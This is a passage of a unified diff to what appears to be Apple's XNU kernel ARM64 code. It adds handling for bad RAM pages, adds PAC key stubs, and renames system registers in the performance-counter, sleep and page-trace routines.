in_processor_info->cpu_id, in_processor_info->cluster_id, this_cpu_datap->cpu_number, in_processor_info->cluster_type); @@ -1560,12 +1586,25 @@ ml_static_protect( void ml_static_mfree( vm_offset_t vaddr, - vm_size_t size) + vm_size_t size) { - vm_offset_t vaddr_cur; - ppnum_t ppn; - uint32_t freed_pages = 0; - uint32_t freed_kernelcache_pages = 0; + vm_offset_t vaddr_cur; + ppnum_t ppn; + uint32_t freed_pages = 0; + uint32_t bad_page_cnt = 0; + uint32_t freed_kernelcache_pages = 0; + +#if defined(__arm64__) && 
(DEVELOPMENT || DEBUG) + /* For testing hitting a bad ram page */ + static int count = 0; + static int bad_at_cnt = -1; + static bool first = true; + + if (first) { + (void)PE_parse_boot_argn("bad_static_mfree", &bad_at_cnt, sizeof(bad_at_cnt)); + first = false; + } +#endif /* defined(__arm64__) && (DEVELOPMENT || DEBUG) */ /* It is acceptable (if bad) to fail to free. */ if (vaddr < VM_MIN_KERNEL_ADDRESS) { @@ -1589,6 +1628,19 @@ ml_static_mfree( panic("Failed ml_static_mfree on %p", (void *) vaddr_cur); } +#if defined(__arm64__) + bool is_bad = pmap_is_bad_ram(ppn); +#if DEVELOPMENT || DEBUG + is_bad |= (count++ == bad_at_cnt); +#endif /* DEVELOPMENT || DEBUG */ + + if (is_bad) { + ++bad_page_cnt; + vm_page_create_retired(ppn); + continue; + } +#endif /* defined(__arm64__) */ + vm_page_create(ppn, (ppn + 1)); freed_pages++; if (vaddr_cur >= segLOWEST && vaddr_cur < end_kern) { @@ -1602,7 +1654,7 @@ ml_static_mfree( vm_page_kernelcache_count -= freed_kernelcache_pages; vm_page_unlock_queues(); #if DEBUG - kprintf("ml_static_mfree: Released 0x%x pages at VA %p, size:0x%llx, last ppn: 0x%x\n", freed_pages, (void *)vaddr, (uint64_t)size, ppn); + kprintf("ml_static_mfree: Released 0x%x pages at VA %p, size:0x%llx, last ppn: 0x%x, +%d bad\n", freed_pages, (void *)vaddr, (uint64_t)size, ppn, bad_page_cnt); #endif } @@ -1888,7 +1940,7 @@ cache_trap_error(thread_t thread, vm_map_address_t fault_addr) } static void -cache_trap_recover() +cache_trap_recover(void) { vm_map_address_t fault_addr; @@ -1901,7 +1953,8 @@ static void set_cache_trap_recover(thread_t thread) { #if defined(HAS_APPLE_PAC) - thread->recover = (vm_address_t)ptrauth_auth_and_resign(&cache_trap_recover, + void *fun = &cache_trap_recover; + thread->recover = (vm_address_t)ptrauth_auth_and_resign(fun, ptrauth_key_function_pointer, 0, ptrauth_key_function_pointer, ptrauth_blend_discriminator(&thread->recover, PAC_DISCRIMINATOR_RECOVER)); #else /* defined(HAS_APPLE_PAC) */ diff --git 
a/osfmk/arm64/machine_routines_asm.s b/osfmk/arm64/machine_routines_asm.s index 5c88ab5c4..f1f0da437 100644 --- a/osfmk/arm64/machine_routines_asm.s +++ b/osfmk/arm64/machine_routines_asm.s @@ -36,6 +36,30 @@ #include "assym.s" +#if defined(HAS_APPLE_PAC) + + +.macro LOAD_CPU_JOP_KEY dst, tmp + mrs \tmp, TPIDR_EL1 + ldr \tmp, [\tmp, ACT_CPUDATAP] + ldr \dst, [\tmp, CPU_JOP_KEY] +.endmacro + +/* + * uint64_t ml_enable_user_jop_key(uint64_t user_jop_key) + */ + .align 2 + .globl EXT(ml_enable_user_jop_key) +LEXT(ml_enable_user_jop_key) + +/* + * void ml_disable_user_jop_key(uint64_t user_jop_key, uint64_t saved_jop_state) + */ + .align 2 + .globl EXT(ml_disable_user_jop_key) +LEXT(ml_disable_user_jop_key) + +#endif /* defined(HAS_APPLE_PAC) */ #if HAS_BP_RET @@ -53,11 +77,11 @@ LEXT(set_bp_ret) add x14, x14, EXT(bp_ret)@pageoff ldr w14, [x14] - mrs x13, ARM64_REG_ACC_CFG + mrs x13, CPU_CFG and x13, x13, (~(ARM64_REG_ACC_CFG_bpSlp_mask << ARM64_REG_ACC_CFG_bpSlp_shift)) and x14, x14, #(ARM64_REG_ACC_CFG_bpSlp_mask) orr x13, x13, x14, lsl #(ARM64_REG_ACC_CFG_bpSlp_shift) - msr ARM64_REG_ACC_CFG, x13 + msr CPU_CFG, x13 ret #endif // HAS_BP_RET @@ -72,8 +96,8 @@ LEXT(set_nex_pg) cbz x14, Lnex_pg_done // Set the SEG-recommended value of 12 additional reset cycles - HID_INSERT_BITS ARM64_REG_HID13, ARM64_REG_HID13_RstCyc_mask, ARM64_REG_HID13_RstCyc_val, x13 - HID_SET_BITS ARM64_REG_HID14, ARM64_REG_HID14_NexPwgEn, x13 + HID_INSERT_BITS HID13, ARM64_REG_HID13_RstCyc_mask, ARM64_REG_HID13_RstCyc_val, x13 + HID_SET_BITS HID14, ARM64_REG_HID14_NexPwgEn, x13 Lnex_pg_done: ret @@ -190,7 +214,7 @@ LEXT(set_mmu_ttb_alternate) #else #if defined(HAS_VMSA_LOCK) #if DEBUG || DEVELOPMENT - mrs x1, ARM64_REG_VMSA_LOCK_EL1 + mrs x1, VMSA_LOCK_EL1 and x1, x1, #(VMSA_LOCK_TTBR1_EL1) cbnz x1, L_set_locked_reg_panic #endif /* DEBUG || DEVELOPMENT */ @@ -265,7 +289,7 @@ LEXT(vmsa_lock) mov x0, #(VMSA_LOCK_TTBR1_EL1 | VMSA_LOCK_TCR_EL1 | VMSA_LOCK_VBAR_EL1) #endif orr x0, x0, x1 - msr 
ARM64_REG_VMSA_LOCK_EL1, x0 + msr VMSA_LOCK_EL1, x0 isb sy ret #endif /* defined(HAS_VMSA_LOCK) */ @@ -293,7 +317,7 @@ LEXT(set_tcr) #if defined(HAS_VMSA_LOCK) #if DEBUG || DEVELOPMENT // assert TCR unlocked - mrs x1, ARM64_REG_VMSA_LOCK_EL1 + mrs x1, VMSA_LOCK_EL1 and x1, x1, #(VMSA_LOCK_TCR_EL1) cbnz x1, L_set_locked_reg_panic #endif /* DEBUG || DEVELOPMENT */ @@ -730,7 +754,7 @@ LEXT(arm64_prepare_for_sleep) #if defined(APPLETYPHOON) // - HID_SET_BITS ARM64_REG_HID2, ARM64_REG_HID2_disMMUmtlbPrefetch, x9 + HID_SET_BITS HID2, ARM64_REG_HID2_disMMUmtlbPrefetch, x9 dsb sy isb sy #endif @@ -738,11 +762,11 @@ LEXT(arm64_prepare_for_sleep) #if HAS_CLUSTER cbnz x0, 1f // Skip if deep_sleep == true // Mask FIQ and IRQ to avoid spurious wakeups - mrs x9, ARM64_REG_CYC_OVRD + mrs x9, CPU_OVRD and x9, x9, #(~(ARM64_REG_CYC_OVRD_irq_mask | ARM64_REG_CYC_OVRD_fiq_mask)) mov x10, #(ARM64_REG_CYC_OVRD_irq_disable | ARM64_REG_CYC_OVRD_fiq_disable) orr x9, x9, x10 - msr ARM64_REG_CYC_OVRD, x9 + msr CPU_OVRD, x9 isb 1: #endif @@ -750,7 +774,7 @@ LEXT(arm64_prepare_for_sleep) cbz x0, 1f // Skip if deep_sleep == false #if __ARM_GLOBAL_SLEEP_BIT__ // Enable deep sleep - mrs x1, ARM64_REG_ACC_OVRD + mrs x1, ACC_OVRD orr x1, x1, #(ARM64_REG_ACC_OVRD_enDeepSleep) and x1, x1, #(~(ARM64_REG_ACC_OVRD_disL2Flush4AccSlp_mask)) orr x1, x1, #( ARM64_REG_ACC_OVRD_disL2Flush4AccSlp_deepsleep) @@ -763,23 +787,40 @@ LEXT(arm64_prepare_for_sleep) #if HAS_RETENTION_STATE orr x1, x1, #(ARM64_REG_ACC_OVRD_disPioOnWfiCpu) #endif - msr ARM64_REG_ACC_OVRD, x1 + msr ACC_OVRD, x1 +#if defined(APPLEMONSOON) + // Skye has an ACC_OVRD register for EBLK and PBLK. 
Same bitfield layout for these bits + mrs x1, EBLK_OVRD + orr x1, x1, #(ARM64_REG_ACC_OVRD_enDeepSleep) + and x1, x1, #(~(ARM64_REG_ACC_OVRD_disL2Flush4AccSlp_mask)) + orr x1, x1, #( ARM64_REG_ACC_OVRD_disL2Flush4AccSlp_deepsleep) + and x1, x1, #(~(ARM64_REG_ACC_OVRD_ok2PwrDnSRM_mask)) + orr x1, x1, #( ARM64_REG_ACC_OVRD_ok2PwrDnSRM_deepsleep) + and x1, x1, #(~(ARM64_REG_ACC_OVRD_ok2TrDnLnk_mask)) + orr x1, x1, #( ARM64_REG_ACC_OVRD_ok2TrDnLnk_deepsleep) + and x1, x1, #(~(ARM64_REG_ACC_OVRD_ok2PwrDnCPM_mask)) + orr x1, x1, #( ARM64_REG_ACC_OVRD_ok2PwrDnCPM_deepsleep) + msr EBLK_OVRD, x1 + +#endif #else +#if defined(APPLETYPHOON) || defined(APPLETWISTER) // Enable deep sleep mov x1, ARM64_REG_CYC_CFG_deepSleep - msr ARM64_REG_CYC_CFG, x1 + msr CPU_CFG, x1 +#endif #endif 1: // Set "OK to power down" () - mrs x9, ARM64_REG_CYC_OVRD + mrs x9, CPU_OVRD orr x9, x9, #(ARM64_REG_CYC_OVRD_ok2pwrdn_force_down) #if HAS_RETENTION_STATE orr x9, x9, #(ARM64_REG_CYC_OVRD_disWfiRetn) #endif - msr ARM64_REG_CYC_OVRD, x9 + msr CPU_OVRD, x9 #if defined(APPLEMONSOON) || defined(APPLEVORTEX) ARM64_IS_PCORE x9 @@ -802,12 +843,12 @@ LEXT(arm64_prepare_for_sleep) mrs x9, MIDR_EL1 EXEC_COREALL_REVLO CPU_VERSION_B0, x9, x10 #endif - mrs x9, ARM64_REG_HID10 + mrs x9, HID10 orr x9, x9, #(ARM64_REG_HID10_DisHwpGups) - msr ARM64_REG_HID10, x9 + msr HID10, x9 isb sy and x9, x9, #(~(ARM64_REG_HID10_DisHwpGups)) - msr ARM64_REG_HID10, x9 + msr HID10, x9 isb sy #endif EXEC_END @@ -829,9 +870,9 @@ LEXT(arm64_force_wfi_clock_gate) ARM64_STACK_PROLOG PUSH_FRAME - mrs x0, ARM64_REG_CYC_OVRD + mrs x0, CPU_OVRD orr x0, x0, #(ARM64_REG_CYC_OVRD_ok2pwrdn_force_up) - msr ARM64_REG_CYC_OVRD, x0 + msr CPU_OVRD, x0 POP_FRAME ARM64_STACK_EPILOG @@ -863,7 +904,7 @@ LEXT(typhoon_prepare_for_wfi) PUSH_FRAME // - HID_SET_BITS ARM64_REG_HID2, ARM64_REG_HID2_disMMUmtlbPrefetch, x0 + HID_SET_BITS HID2, ARM64_REG_HID2_disMMUmtlbPrefetch, x0 dsb sy isb sy @@ -878,7 +919,7 @@ LEXT(typhoon_return_from_wfi) PUSH_FRAME // - 
HID_CLEAR_BITS ARM64_REG_HID2, ARM64_REG_HID2_disMMUmtlbPrefetch, x0 + HID_CLEAR_BITS HID2, ARM64_REG_HID2_disMMUmtlbPrefetch, x0 dsb sy isb sy @@ -923,57 +964,57 @@ LEXT(cpu_defeatures_set) cmp x0, #1 b.ne cpu_defeatures_set_ret LOAD_UINT64 x1, HID0_DEFEATURES_1 - mrs x0, ARM64_REG_HID0 + mrs x0, HID0 orr x0, x0, x1 - msr ARM64_REG_HID0, x0 + msr HID0, x0 LOAD_UINT64 x1, HID1_DEFEATURES_1 - mrs x0, ARM64_REG_HID1 + mrs x0, HID1 orr x0, x0, x1 - msr ARM64_REG_HID1, x0 + msr HID1, x0 LOAD_UINT64 x1, HID2_DEFEATURES_1 - mrs x0, ARM64_REG_HID2 + mrs x0, HID2 orr x0, x0, x1 - msr ARM64_REG_HID2, x0 + msr HID2, x0 LOAD_UINT64 x1, HID3_DEFEATURES_1 - mrs x0, ARM64_REG_HID3 + mrs x0, HID3 orr x0, x0, x1 - msr ARM64_REG_HID3, x0 + msr HID3, x0 LOAD_UINT64 x1, HID4_DEFEATURES_1 - mrs x0, ARM64_REG_HID4 + mrs x0, S3_0_C15_C4_0 orr x0, x0, x1 - msr ARM64_REG_HID4, x0 + msr S3_0_C15_C4_0, x0 LOAD_UINT64 x1, HID7_DEFEATURES_1 - mrs x0, ARM64_REG_HID7 + mrs x0, HID7 orr x0, x0, x1 - msr ARM64_REG_HID7, x0 + msr HID7, x0 dsb sy isb sy b cpu_defeatures_set_ret cpu_defeatures_set_2: LOAD_UINT64 x1, HID0_DEFEATURES_2 - mrs x0, ARM64_REG_HID0 + mrs x0, HID0 orr x0, x0, x1 - msr ARM64_REG_HID0, x0 + msr HID0, x0 LOAD_UINT64 x1, HID1_DEFEATURES_2 - mrs x0, ARM64_REG_HID1 + mrs x0, HID1 orr x0, x0, x1 - msr ARM64_REG_HID1, x0 + msr HID1, x0 LOAD_UINT64 x1, HID2_DEFEATURES_2 - mrs x0, ARM64_REG_HID2 + mrs x0, HID2 orr x0, x0, x1 - msr ARM64_REG_HID2, x0 + msr HID2, x0 LOAD_UINT64 x1, HID3_DEFEATURES_2 - mrs x0, ARM64_REG_HID3 + mrs x0, HID3 orr x0, x0, x1 - msr ARM64_REG_HID3, x0 + msr HID3, x0 LOAD_UINT64 x1, HID4_DEFEATURES_2 - mrs x0, ARM64_REG_HID4 + mrs x0, S3_0_C15_C4_0 orr x0, x0, x1 - msr ARM64_REG_HID4, x0 + msr S3_0_C15_C4_0, x0 LOAD_UINT64 x1, HID7_DEFEATURES_2 - mrs x0, ARM64_REG_HID7 + mrs x0, HID7 orr x0, x0, x1 - msr ARM64_REG_HID7, x0 + msr HID7, x0 dsb sy isb sy b cpu_defeatures_set_ret diff --git a/osfmk/arm64/monotonic.h b/osfmk/arm64/monotonic.h index 
cd62e333a..d12abcc6f 100644 --- a/osfmk/arm64/monotonic.h +++ b/osfmk/arm64/monotonic.h @@ -65,15 +65,12 @@ __END_DECLS __BEGIN_DECLS -#define PMCR0 "s3_1_c15_c0_0" - /* set by hardware if a PMI was delivered */ #define PMCR0_PMAI (UINT64_C(1) << 11) #define PMCR0_PMI(REG) ((REG) & PMCR0_PMAI) #if HAS_UNCORE_CTRS -#define UPMSR "s3_7_c15_c6_4" #define UPMSR_PMI(REG) ((REG) & 0x1) #endif /* HAS_UNCORE_CTRS */ @@ -82,20 +79,20 @@ static inline bool mt_pmi_pending(uint64_t * restrict pmcr0_out, uint64_t * restrict upmsr_out) { - uint64_t pmcr0 = __builtin_arm_rsr64(PMCR0); + uint64_t pmcr0 = __builtin_arm_rsr64("PMCR0_EL1"); bool pmi = PMCR0_PMI(pmcr0); if (pmi) { /* * Acknowledge the PMI by clearing the pmai bit. */ - __builtin_arm_wsr64(PMCR0, pmcr0 & ~PMCR0_PMAI); + __builtin_arm_wsr64("PMCR0_EL1", pmcr0 & ~PMCR0_PMAI); } *pmcr0_out = pmcr0; #if HAS_UNCORE_CTRS extern bool mt_uncore_enabled; if (mt_uncore_enabled) { - uint64_t upmsr = __builtin_arm_rsr64(UPMSR); + uint64_t upmsr = __builtin_arm_rsr64("UPMSR_EL1"); if (UPMSR_PMI(upmsr)) { pmi = true; } diff --git a/osfmk/arm64/monotonic_arm64.c b/osfmk/arm64/monotonic_arm64.c index 8cf48ad70..06d845f8f 100644 --- a/osfmk/arm64/monotonic_arm64.c +++ b/osfmk/arm64/monotonic_arm64.c @@ -78,22 +78,10 @@ static const ml_topology_info_t *topology_info; * * PMC2+ are currently handled by kpc. */ - -#define PMC0 "s3_2_c15_c0_0" -#define PMC1 "s3_2_c15_c1_0" -#define PMC2 "s3_2_c15_c2_0" -#define PMC3 "s3_2_c15_c3_0" -#define PMC4 "s3_2_c15_c4_0" -#define PMC5 "s3_2_c15_c5_0" -#define PMC6 "s3_2_c15_c6_0" -#define PMC7 "s3_2_c15_c7_0" - #define PMC_0_7(X, A) X(0, A); X(1, A); X(2, A); X(3, A); X(4, A); X(5, A); \ X(6, A); X(7, A) #if CORE_NCTRS > 8 -#define PMC8 "s3_2_c15_c9_0" -#define PMC9 "s3_2_c15_c10_0" #define PMC_8_9(X, A) X(8, A); X(9, A) #else // CORE_NCTRS > 8 #define PMC_8_9(X, A) @@ -167,9 +155,6 @@ enum { /* * PMCR1 controls which execution modes count events. 
*/ - -#define PMCR1 "s3_1_c15_c1_0" - #define PMCR1_EL0A32_EN(CTR) (UINT64_C(1) << (0 + CTR_POS(CTR))) #define PMCR1_EL0A64_EN(CTR) (UINT64_C(1) << (8 + CTR_POS(CTR))) #define PMCR1_EL1A64_EN(CTR) (UINT64_C(1) << (16 + CTR_POS(CTR))) @@ -190,30 +175,13 @@ core_init_execution_modes(void) { uint64_t pmcr1; - pmcr1 = __builtin_arm_rsr64(PMCR1); + pmcr1 = __builtin_arm_rsr64("PMCR1_EL1"); pmcr1 |= PMCR1_INIT; - __builtin_arm_wsr64(PMCR1, pmcr1); + __builtin_arm_wsr64("PMCR1_EL1", pmcr1); } -/* - * PMCR2 controls watchpoint registers. - * - * PMCR3 controls breakpoints and address matching. - * - * PMCR4 controls opcode matching. - */ - -#define PMCR2 "s3_1_c15_c2_0" -#define PMCR3 "s3_1_c15_c3_0" -#define PMCR4 "s3_1_c15_c4_0" - -#define PMSR "s3_1_c15_c13_0" - #define PMSR_OVF(CTR) (1ULL << (CTR)) -#define PMESR0 "S3_1_c15_c5_0" -#define PMESR1 "S3_1_c15_c6_0" - static int core_init(__unused mt_device_t dev) { @@ -231,7 +199,7 @@ uint64_t mt_core_snap(unsigned int ctr) { switch (ctr) { -#define PMC_RD(CTR, UNUSED) case (CTR): return __builtin_arm_rsr64(PMC ## CTR) +#define PMC_RD(CTR, UNUSED) case (CTR): return __builtin_arm_rsr64(__MSR_STR(PMC ## CTR)) PMC_ALL(PMC_RD, 0); #undef PMC_RD default: @@ -245,10 +213,10 @@ mt_core_set_snap(unsigned int ctr, uint64_t count) { switch (ctr) { case 0: - __builtin_arm_wsr64(PMC0, count); + __builtin_arm_wsr64("PMC0", count); break; case 1: - __builtin_arm_wsr64(PMC1, count); + __builtin_arm_wsr64("PMC1", count); break; default: panic("monotonic: invalid core counter %u write %llu", ctr, count); @@ -259,7 +227,7 @@ mt_core_set_snap(unsigned int ctr, uint64_t count) static void core_set_enabled(void) { - uint64_t pmcr0 = __builtin_arm_rsr64(PMCR0); + uint64_t pmcr0 = __builtin_arm_rsr64("PMCR0_EL1"); pmcr0 |= PMCR0_INIT | PMCR0_FIXED_EN; if (kpc_get_running() & KPC_CLASS_CONFIGURABLE_MASK) { @@ -275,12 +243,12 @@ core_set_enabled(void) pmcr0 |= kpc_ctrs; } - __builtin_arm_wsr64(PMCR0, pmcr0); + __builtin_arm_wsr64("PMCR0_EL1", 
pmcr0); #if MACH_ASSERT /* * Only check for the values that were ORed in. */ - uint64_t pmcr0_check = __builtin_arm_rsr64(PMCR0); + uint64_t pmcr0_check = __builtin_arm_rsr64("PMCR0_EL1"); if ((pmcr0_check & (PMCR0_INIT | PMCR0_FIXED_EN)) != (PMCR0_INIT | PMCR0_FIXED_EN)) { panic("monotonic: hardware ignored enable (read %llx, wrote %llx)", pmcr0_check, pmcr0); @@ -295,18 +263,18 @@ core_idle(__unused cpu_data_t *cpu) assert(ml_get_interrupts_enabled() == FALSE); #if DEBUG - uint64_t pmcr0 = __builtin_arm_rsr64(PMCR0); + uint64_t pmcr0 = __builtin_arm_rsr64("PMCR0_EL1"); if ((pmcr0 & PMCR0_FIXED_EN) == 0) { panic("monotonic: counters disabled before idling, pmcr0 = 0x%llx\n", pmcr0); } - uint64_t pmcr1 = __builtin_arm_rsr64(PMCR1); + uint64_t pmcr1 = __builtin_arm_rsr64("PMCR1_EL1"); if ((pmcr1 & PMCR1_INIT) == 0) { panic("monotonic: counter modes disabled before idling, pmcr1 = 0x%llx\n", pmcr1); } #endif /* DEBUG */ /* disable counters before updating */ - __builtin_arm_wsr64(PMCR0, PMCR0_INIT); + __builtin_arm_wsr64("PMCR0_EL1", PMCR0_INIT); mt_update_fixed_counts(); } @@ -348,7 +316,6 @@ static uintptr_t cpm_impl[MAX_NMONITORS] = {}; #define UPMSR_OVF(R, CTR) ((R) >> ((CTR) + UPMSR_OVF_POS) & 0x1) #define UPMSR_OVF_MASK (((UINT64_C(1) << UNCORE_NCTRS) - 1) << UPMSR_OVF_POS) -#define UPMPCM "s3_7_c15_c5_4" #define UPMPCM_CORE(ID) (UINT64_C(1) << (ID)) /* @@ -488,8 +455,7 @@ uncmon_set_counting_locked_l(__unused unsigned int monid, uint64_t enctrmask) * UPMCR0 controls which counters are enabled and how interrupts are generated * for overflows. */ -#define UPMCR0 "s3_7_c15_c0_4" - __builtin_arm_wsr64(UPMCR0, UPMCR0_INIT | enctrmask); + __builtin_arm_wsr64("UPMCR0_EL1", UPMCR0_INIT | enctrmask); } #if UNCORE_PER_CLUSTER @@ -519,25 +485,6 @@ uncmon_set_counting_locked_r(unsigned int monid, uint64_t enctrmask) * would be indexing into an array of strings. 
*/ -#define UPMC0 "s3_7_c15_c7_4" -#define UPMC1 "s3_7_c15_c8_4" -#define UPMC2 "s3_7_c15_c9_4" -#define UPMC3 "s3_7_c15_c10_4" -#define UPMC4 "s3_7_c15_c11_4" -#define UPMC5 "s3_7_c15_c12_4" -#define UPMC6 "s3_7_c15_c13_4" -#define UPMC7 "s3_7_c15_c14_4" -#if UNCORE_NCTRS > 8 -#define UPMC8 "s3_7_c15_c0_5" -#define UPMC9 "s3_7_c15_c1_5" -#define UPMC10 "s3_7_c15_c2_5" -#define UPMC11 "s3_7_c15_c3_5" -#define UPMC12 "s3_7_c15_c4_5" -#define UPMC13 "s3_7_c15_c5_5" -#define UPMC14 "s3_7_c15_c6_5" -#define UPMC15 "s3_7_c15_c7_5" -#endif /* UNCORE_NCTRS > 8 */ - #define UPMC_0_7(X, A) X(0, A); X(1, A); X(2, A); X(3, A); X(4, A); X(5, A); \ X(6, A); X(7, A) #if UNCORE_NCTRS <= 8 @@ -553,7 +500,7 @@ uncmon_read_counter_locked_l(__unused unsigned int monid, unsigned int ctr) { assert(ctr < UNCORE_NCTRS); switch (ctr) { -#define UPMC_RD(CTR, UNUSED) case (CTR): return __builtin_arm_rsr64(UPMC ## CTR) +#define UPMC_RD(CTR, UNUSED) case (CTR): return __builtin_arm_rsr64(__MSR_STR(UPMC ## CTR)) UPMC_ALL(UPMC_RD, 0); #undef UPMC_RD default: @@ -570,7 +517,7 @@ uncmon_write_counter_locked_l(__unused unsigned int monid, unsigned int ctr, assert(ctr < UNCORE_NCTRS); switch (ctr) { #define UPMC_WR(CTR, COUNT) case (CTR): \ - return __builtin_arm_wsr64(UPMC ## CTR, (COUNT)) + return __builtin_arm_wsr64(__MSR_STR(UPMC ## CTR), (COUNT)) UPMC_ALL(UPMC_WR, count); #undef UPMC_WR default: @@ -632,12 +579,10 @@ uncmon_program_events_locked_l(unsigned int monid) * UPMESR[01] is the event selection register that determines which event a * counter will count. 
*/ -#define UPMESR0 "s3_7_c15_c1_4" - CTRL_REG_SET(UPMESR0, uncore_config.uc_events.uce_regs[0]); + CTRL_REG_SET("UPMESR0_EL1", uncore_config.uc_events.uce_regs[0]); #if UNCORE_NCTRS > 8 -#define UPMESR1 "s3_7_c15_c11_5" - CTRL_REG_SET(UPMESR1, uncore_config.uc_events.uce_regs[1]); + CTRL_REG_SET("UPMESR1_EL1", uncore_config.uc_events.uce_regs[1]); #endif /* UNCORE_NCTRS > 8 */ /* @@ -649,21 +594,15 @@ uncmon_program_events_locked_l(unsigned int monid) * has a CPU ID of 4, it might be the first CPU in a cluster. Shift the * registers right by the ID of the first CPU in the cluster. */ -#define UPMECM0 "s3_7_c15_c3_4" -#define UPMECM1 "s3_7_c15_c4_4" - - CTRL_REG_SET(UPMECM0, + CTRL_REG_SET("UPMECM0_EL1", uncore_config.uc_cpu_masks[monid].uccm_regs[0]); - CTRL_REG_SET(UPMECM1, + CTRL_REG_SET("UPMECM1_EL1", uncore_config.uc_cpu_masks[monid].uccm_regs[1]); #if UNCORE_NCTRS > 8 -#define UPMECM2 "s3_7_c15_c8_5" -#define UPMECM3 "s3_7_c15_c9_5" - - CTRL_REG_SET(UPMECM2, + CTRL_REG_SET("UPMECM2_EL1", uncore_config.uc_cpu_masks[monid].uccm_regs[2]); - CTRL_REG_SET(UPMECM3, + CTRL_REG_SET("UPMECM3_EL1", uncore_config.uc_cpu_masks[monid].uccm_regs[3]); #endif /* UNCORE_NCTRS > 8 */ } @@ -697,7 +636,7 @@ uncmon_program_events_locked_r(unsigned int monid) static void uncmon_clear_int_locked_l(__unused unsigned int monid) { - __builtin_arm_wsr64(UPMSR, 0); + __builtin_arm_wsr64("UPMSR_EL1", 0); } #if UNCORE_PER_CLUSTER @@ -740,7 +679,7 @@ uncmon_init_locked_l(unsigned int monid) * UPMPCM defines the PMI core mask for the UPMCs -- which cores should * receive interrupts on overflow. */ - CTRL_REG_SET(UPMPCM, uncmon_get_pmi_mask(monid)); + CTRL_REG_SET("UPMPCM_EL1", uncmon_get_pmi_mask(monid)); uncmon_set_counting_locked_l(monid, mt_uncore_enabled ? 
uncore_active_ctrs : 0); } @@ -821,7 +760,7 @@ uncore_init(__unused mt_device_t dev) #endif /* UNCORE_PER_CLUSTER */ struct uncore_monitor *mon = &uncore_monitors[monid]; - lck_spin_init(&mon->um_lock, mt_lock_grp, NULL); + lck_spin_init(&mon->um_lock, &mt_lock_grp, LCK_ATTR_NULL); int intrs_en = uncmon_lock(mon); if (monid != curmonid) { @@ -1261,7 +1200,7 @@ mt_cpu_pmi(cpu_data_t *cpu, uint64_t pmcr0) assert(cpu != NULL); assert(ml_get_interrupts_enabled() == FALSE); - __builtin_arm_wsr64(PMCR0, PMCR0_INIT); + __builtin_arm_wsr64("PMCR0_EL1", PMCR0_INIT); /* * Ensure the CPMU has flushed any increments at this point, so PMSR is up * to date. @@ -1280,7 +1219,7 @@ mt_cpu_pmi(cpu_data_t *cpu, uint64_t pmcr0) #pragma unused(pmcr0) #endif /* !MONOTONIC_DEBUG */ - uint64_t pmsr = __builtin_arm_rsr64(PMSR); + uint64_t pmsr = __builtin_arm_rsr64("PMSR_EL1"); #if MONOTONIC_DEBUG printf("monotonic: cpu = %d, PMSR = 0x%llx, PMCR0 = 0x%llx\n", @@ -1336,7 +1275,7 @@ mt_cpu_pmi(cpu_data_t *cpu, uint64_t pmcr0) } #if MACH_ASSERT - uint64_t pmsr_after_handling = __builtin_arm_rsr64(PMSR); + uint64_t pmsr_after_handling = __builtin_arm_rsr64("PMSR_EL1"); if (pmsr_after_handling != 0) { unsigned int first_ctr_ovf = __builtin_ffsll(pmsr_after_handling) - 1; uint64_t count = 0; @@ -1350,7 +1289,7 @@ mt_cpu_pmi(cpu_data_t *cpu, uint64_t pmcr0) panic("monotonic: PMI status not cleared on exit from handler, " "PMSR = 0x%llx HANDLE -> -> 0x%llx, handled 0x%llx, " "PMCR0 = 0x%llx, PMC%d = 0x%llx%s", pmsr, pmsr_after_handling, - handled, __builtin_arm_rsr64(PMCR0), first_ctr_ovf, count, extra); + handled, __builtin_arm_rsr64("PMCR0_EL1"), first_ctr_ovf, count, extra); } #endif /* MACH_ASSERT */ @@ -1366,7 +1305,7 @@ mt_cpmu_aic_pmi(cpu_id_t source) panic("monotonic: PMI from IOCPU %p delivered to %p", source, curcpu->interrupt_nub); } - mt_cpu_pmi(curcpu, __builtin_arm_rsr64(PMCR0)); + mt_cpu_pmi(curcpu, __builtin_arm_rsr64("PMCR0_EL1")); } #endif /* CPMU_AIC_PMI */ @@ -1393,7 +1332,7 @@ 
mt_microstackshot_start_remote(__unused void *arg) { cpu_data_t *cpu = getCpuDatap(); - __builtin_arm_wsr64(PMCR0, PMCR0_INIT); + __builtin_arm_wsr64("PMCR0_EL1", PMCR0_INIT); for (int i = 0; i < MT_CORE_NFIXED; i++) { uint64_t count = mt_cpu_update_count(cpu, i); diff --git a/osfmk/arm64/pgtrace.c b/osfmk/arm64/pgtrace.c index d13c8415b..d9b2d634c 100644 --- a/osfmk/arm64/pgtrace.c +++ b/osfmk/arm64/pgtrace.c @@ -70,7 +70,6 @@ static struct { log_t *logs; // Protect uint32_t size; // Protect uint64_t rdidx, wridx; // Protect - decl_simple_lock_data(, loglock); uint64_t id; uint32_t option; @@ -78,12 +77,11 @@ static struct { uint32_t bytes; queue_head_t probes; // Protect +} pgtrace; - lck_grp_t *lock_grp; - lck_grp_attr_t *lock_grp_attr; - lck_attr_t *lock_attr; - lck_mtx_t probelock; -} pgtrace = {}; +static LCK_GRP_DECLARE(pgtrace_lock_grp, "pgtrace_lock"); +static LCK_MTX_DECLARE(pgtrace_probelock, &pgtrace_lock_grp); +static SIMPLE_LOCK_DECLARE(pgtrace_loglock, 0); //-------------------------------------------- // Globals @@ -91,14 +89,6 @@ static struct { void pgtrace_init(void) { - simple_lock_init(&pgtrace.loglock, 0); - - pgtrace.lock_attr = lck_attr_alloc_init(); - pgtrace.lock_grp_attr = lck_grp_attr_alloc_init(); - pgtrace.lock_grp = lck_grp_alloc_init("pgtrace_lock", pgtrace.lock_grp_attr); - - lck_mtx_init(&pgtrace.probelock, pgtrace.lock_grp, pgtrace.lock_attr); - queue_init(&pgtrace.probes); pgtrace.size = RBUF_DEFAULT_SIZE; @@ -111,7 +101,7 @@ pgtrace_clear_probe(void) probe_t *p, *next; queue_head_t *q = &pgtrace.probes; - lck_mtx_lock(&pgtrace.probelock); + lck_mtx_lock(&pgtrace_probelock); p = (probe_t *)queue_first(q); while (!queue_end(q, (queue_entry_t)p)) { @@ -123,9 +113,7 @@ pgtrace_clear_probe(void) p = next; } - lck_mtx_unlock(&pgtrace.probelock); - - return; + lck_mtx_unlock(&pgtrace_probelock); } int @@ -148,9 +136,9 @@ pgtrace_add_probe(thread_t thread, vm_offset_t start, vm_offset_t end) p->pmap = vm_map_pmap(thread->map); } - 
